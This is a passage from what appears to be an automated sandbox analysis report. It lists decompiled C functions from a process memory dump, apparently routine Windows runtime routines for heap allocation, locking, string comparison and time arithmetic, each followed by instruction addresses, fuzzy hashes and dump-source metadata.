								_t174 = _v12 + _v8;
								if(E05247D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E05269AE0();
								L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L05242400( &_v36);
							if(_v24 >= 0) {
								_t87 = L05242400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L05242400( &_v52);
							}
							if(_v28 >= 0) {
								return L05242400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x052a6dd4
0x052a6dde
0x052a6de1
0x052a6de3
0x052a6de6
0x052a6de9
0x052a6dec
0x052a6def
0x052a6df2
0x052a6df5
0x052a6dfe
0x052a6e04
0x052a6e09
0x052a6e0d
0x052a6e18
0x052a6e1b
0x052a6e22
0x052a6e2d
0x052a6e30
0x052a6e36
0x052a6e42
0x052a6e4d
0x052a6e50
0x052a6e55
0x052a6e5c
0x052a6e6e
0x052a6e5e
0x052a6e67
0x052a6e67
0x052a6e73
0x052a6e74
0x052a6e77
0x052a6e7c
0x052a6e7d
0x052a6e8e
0x052a6e93
0x052a6e9c
0x052a6ea8
0x052a6eab
0x052a6eac
0x052a6eb3
0x052a6ecd
0x052a6edc
0x052a6ee2
0x052a6ee5
0x052a6ef2
0x052a6efb
0x052a6f01
0x052a6f06
0x052a6f0b
0x052a6f11
0x052a6f1a
0x052a6f22
0x052a6f26
0x052a6f26
0x052a6f33
0x052a6f41
0x052a6f44
0x052a6f47
0x052a6f54
0x052a6f65
0x052a6f77
0x052a6f7c
0x052a6f82
0x052a6f91
0x052a6f99
0x052a6fa3
0x052a6fae
0x052a6fae
0x052a6fba
0x052a6fbb
0x052a6fbc
0x052a6fc1
0x052a6fc2
0x052a6fd3
0x052a6fd8
0x052a6fd8
0x052a6fdf
0x052a6fe8
0x052a6fee
0x052a6fee
0x052a6ff5
0x052a6ffb
0x052a6ffb
0x052a7004
0x00000000
0x052a700a
0x052a7004
0x052a6eb3
0x052a6e9c
0x052a7015

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: d066630dc9e4f429f6307959e48c8bc1daf451b4fcdee15a82594c7049a0e672
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 1C717C72E10209EFCB15DFA5C988EEEBBB9FF48714F144469E509E7250DB30AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 052BB8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E052BB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x5317b9c; // 0x0
				_t124 = L05244620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E05269800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E052695B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E052695D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L052477F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E05269910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E052695D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x5317b9c; // 0x0
									_t92 = L05244620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E05269910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0522A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E052BE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E052BE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E052695B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x052bb8d9
0x052bb8e4
0x00000000
0x052bb8e6
0x052bb8f3
0x052bb8f5
0x052bb8f5
0x052bb8f8
0x052bb920
0x052bb924
0x052bb936
0x052bb939
0x052bb93d
0x052bb948
0x052bb9a0
0x052bb9a0
0x052bb9a4
0x052bb9bf
0x052bb9c4
0x052bb9c6
0x052bb9cd
0x052bb9d1
0x052bbad4
0x052bbad8
0x052bbada
0x052bbadc
0x052bbadc
0x052bbadf
0x052bbae0
0x052bbae2
0x052bbae4
0x052bbaec
0x052bbaee
0x052bbaf0
0x052bbaf0
0x052bbaec
0x052bbafb
0x052bbafc
0x052bbafe
0x052bbb01
0x052bbb01
0x00000000
0x052bbb06
0x052bb9d7
0x052bb9db
0x052bb9db
0x052bb9de
0x052bb9de
0x052bb9e4
0x052bb9e7
0x052bb9ea
0x052bb9ec
0x052bb9ef
0x052bb9f3
0x052bba1b
0x052bba1b
0x052bba23
0x052bba24
0x052bba27
0x052bba2a
0x052bba2b
0x052bba2e
0x052bba30
0x052bba37
0x052bba3f
0x052bba9c
0x052bbaa2
0x052bbb13
0x052bbb15
0x052bbaae
0x052bbaae
0x052bbab3
0x052bbab5
0x052bbaba
0x052bbac8
0x052bbac8
0x052bbaba
0x052bbacd
0x052bbacf
0x00000000
0x052bbacf
0x052bbb1a
0x00000000
0x052bbb1c
0x052bbaa7
0x052bbb11
0x00000000
0x052bbb11
0x052bbaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x052bba41
0x052bba41
0x052bba41
0x052bba58
0x052bba5d
0x052bba62
0x00000000
0x00000000
0x052bba64
0x052bba67
0x052bba68
0x052bba69
0x052bba6c
0x052bba6f
0x052bba71
0x052bba78
0x052bba80
0x00000000
0x00000000
0x052bba90
0x052bba90
0x052bba97
0x00000000
0x052bba97
0x052bb9f5
0x052bb9f7
0x052bb9f7
0x052bb9fa
0x052bba03
0x052bba07
0x052bba0c
0x052bba10
0x052bba17
0x00000000
0x052bb9f7
0x052bb9a6
0x052bb9a8
0x052bb9af
0x052bb9b3
0x00000000
0x00000000
0x052bb9b9
0x00000000
0x052bb9b9
0x052bb94d
0x052bb98f
0x052bb995
0x052bb999
0x052bb960
0x052bb967
0x052bb968
0x052bb96a
0x00000000
0x052bb96a
0x052bb99b
0x052bb99e
0x00000000
0x00000000
0x00000000
0x052bb99e
0x052bb951
0x052bb954
0x052bb95a
0x052bb95e
0x052bb972
0x052bb979
0x052bb97d
0x052bb97f
0x052bb980
0x052bb982
0x052bb984
0x00000000
0x052bb984
0x00000000
0x052bb926
0x00000000
0x052bb926

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd1f0fbd0574bc1cf8138f9a97fa93ea8042d47a642766073b523f7d90b700f0
Instruction ID: b65927063a3286baa772d6fdf917c99cc469a80be756fdc644e23c80024ffd5b
Opcode Fuzzy Hash: bd1f0fbd0574bc1cf8138f9a97fa93ea8042d47a642766073b523f7d90b700f0
Instruction Fuzzy Hash: 9571F572620B02AFE731DF14C885FA6B7B6FF44790F144528E65A876A0DBB1E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 052252A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E052252A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0523EEF0(0x53179a0);
					_t104 =  *0x5318210; // 0x1141cc0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0523EB70(_t93, 0x53179a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E05269890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0523EEF0(0x53179a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0523EB70(0, 0x53179a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1141ccd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0525F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0523EEF0(0x53179a0);
									__eflags =  *0x5318210 - _t104; // 0x1141cc0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x5318210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E052A4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0523EB70(_t95, 0x53179a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E052695D0();
											L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E052695D0();
											L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0523EB70(_t93, 0x53179a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E052695D0();
										L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E052695D0();
										L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0525F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x052252a5
0x052252ad
0x052252b0
0x052252b3
0x052252b7
0x052252ba
0x052252bf
0x052252c4
0x052252cc
0x00000000
0x00000000
0x052252ce
0x052252d9
0x052252dd
0x052252e7
0x052252f7
0x052252f9
0x052252fd
0x05280dcf
0x05280dd5
0x05280dd6
0x05280dd7
0x05280dd8
0x05280dd9
0x05280dde
0x05280ddf
0x05280de0
0x05280de1
0x05280de2
0x05280de5
0x05280dea
0x05280dec
0x05280f60
0x05280f64
0x05280f70
0x05280f76
0x05280f79
0x05280f79
0x00000000
0x05280f64
0x05280df2
0x05280df7
0x05280e04
0x05280e0d
0x05280e0d
0x05280e10
0x05280e1a
0x05280e1c
0x05280e4c
0x05280e52
0x05280e61
0x05280e67
0x05280e6b
0x05280e70
0x05280e76
0x05280ed7
0x05280edc
0x05280ee0
0x05280ee6
0x05280eea
0x05280eed
0x05280ef0
0x05280ef3
0x05280ef6
0x05280ef9
0x05280efe
0x05280f01
0x05280f01
0x05280f0b
0x05280f12
0x05280f16
0x05280f18
0x05280f1b
0x05280f2c
0x05280f31
0x05280f31
0x05280f35
0x05280f39
0x05280f3a
0x05280f3c
0x05280f3f
0x05280f50
0x05280f55
0x05280f55
0x05280f59
0x052252eb
0x052252f1
0x052252f1
0x05280e7d
0x05280e84
0x05280e88
0x05280e8a
0x05280e8d
0x05280e9e
0x05280ea3
0x05280ea3
0x05280ea7
0x05280eaf
0x05280eb3
0x05280eb9
0x05280eb9
0x05280ebc
0x05280ecd
0x05280ecd
0x00000000
0x05280eb3
0x05280e21
0x05280e2b
0x05280e2f
0x05280e30
0x05280e3a
0x05280e3f
0x05280e41
0x00000000
0x00000000
0x05280e47
0x00000000
0x05280e47
0x05280df9
0x05280dfe
0x00000000
0x00000000
0x00000000
0x05280dfe
0x05225303
0x05225307
0x00000000
0x05225309
0x00000000
0x05225309
0x05225307
0x052252e9
0x052252e9
0x00000000
0x052252e9
0x0522530e
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e0dedfa06ee3592cc6d4e186421fc9091cc3e3ed97e32602aec3941f8488191
Instruction ID: 4ed21ee8ee0c25ab9573c9c07ac0f94ea67b26df3f2043c14b719d32a5583bb4
Opcode Fuzzy Hash: 3e0dedfa06ee3592cc6d4e186421fc9091cc3e3ed97e32602aec3941f8488191
Instruction Fuzzy Hash: C951F471325742AFC321EF68C849B27BBE5FF40710F14491EE49A87690EB70E848CB96

Uniqueness

Uniqueness Score: -1.00%

Function 05252AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05252AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x5318204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x5318208; // 0x5318207
				_t8 = _t57 + 0x5318208; // 0x5318207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x5318450;
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x531821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x5316d5c; // 0x7f8b0654
							_t72 =  *0x5316d5c; // 0x7f8b0654
							_t75 =  *0x5316d5c; // 0x7f8b0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x5316d5c; // 0x7f8b0654
							_t84 =  *0x5316d5c; // 0x7f8b0654
							_t87 =  *0x5316d5c; // 0x7f8b0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0526F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x05252ae4
0x05252aec
0x05252aef
0x05252af4
0x05252af7
0x05252afd
0x05252b92
0x05252b92
0x05252b97
0x05252b9c
0x05252b9c
0x05252b03
0x05252b06
0x05252b09
0x05252b09
0x05252b0f
0x05252b15
0x05252b15
0x05252b1b
0x05252b1e
0x05252b21
0x05252b26
0x05252b29
0x05252b81
0x05252b84
0x05252c0e
0x05252c15
0x05252c24
0x05252c24
0x05252b8a
0x05252b8a
0x05252b8a
0x05252b8a
0x05252b90
0x00000000
0x00000000
0x00000000
0x00000000
0x05252b4a
0x05252b4a
0x05252b4d
0x05252b53
0x00000000
0x00000000
0x05252b55
0x05252b58
0x05252bb7
0x05295d1b
0x05295d37
0x05295d47
0x05295d53
0x05252bbd
0x05252bbd
0x05252bbd
0x05252bb7
0x05252b5d
0x05252c2f
0x05295d5b
0x05295d77
0x05295d87
0x05295d93
0x05252c35
0x05252c35
0x05252c35
0x05252c2f
0x05252b65
0x05252b9f
0x05252ba2
0x05252b67
0x05252b67
0x05252b69
0x05252b6b
0x05252b6e
0x05252bc9
0x05252bcc
0x05252bcf
0x05252bd4
0x05252bd6
0x05252bd6
0x05252bdb
0x05252c02
0x05252c05
0x05252c07
0x00000000
0x05252c07
0x05252be0
0x05252c00
0x05252c3f
0x05252c3f
0x00000000
0x05252c00
0x05252be5
0x05252be7
0x05252bec
0x05252bf4
0x05252bf6
0x00000000
0x05252bf6
0x05252b70
0x05252b76
0x05252b2b
0x05252b2b
0x05252b2d
0x05252b2f
0x05252b32
0x05252b35
0x05252b3a
0x00000000
0x05252b40
0x05252b43
0x05252b45
0x05252b47
0x05252b4a
0x05252b4d
0x05252b53
0x00000000
0x00000000
0x00000000
0x05252b53
0x05252b78
0x05252b78
0x05252b7b
0x05252b7e
0x00000000
0x05252b7e
0x05252b76
0x05252ba5
0x05252ba5
0x05252ba8
0x05252bad
0x00000000
0x00000000
0x05252baf
0x05252baf
0x05252bc2
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4309747158fbd035bffc0d3bf31a10c64240dad958d2458670444f73fd3baced
Instruction ID: 5b4097f7c8b924ae6c74e1b55d7cecc8e29d51666f939622d453726e9e091ae4
Opcode Fuzzy Hash: 4309747158fbd035bffc0d3bf31a10c64240dad958d2458670444f73fd3baced
Instruction Fuzzy Hash: FF51C57AB20125CFCB18CF5CC490ABDB7B6FF88710715855AEC46AB394D730AA51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0524DBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0524DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0522CC50(E05224510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E05247D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E052F8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E05242280(_t58, _v44);
						E0524DD82(_v44, _t102, _t98);
						E0524B944(_t102, _v5);
						return E0523FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x5318628; // 0x0
							_v28 = _t67;
							_t68 =  *0x531862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
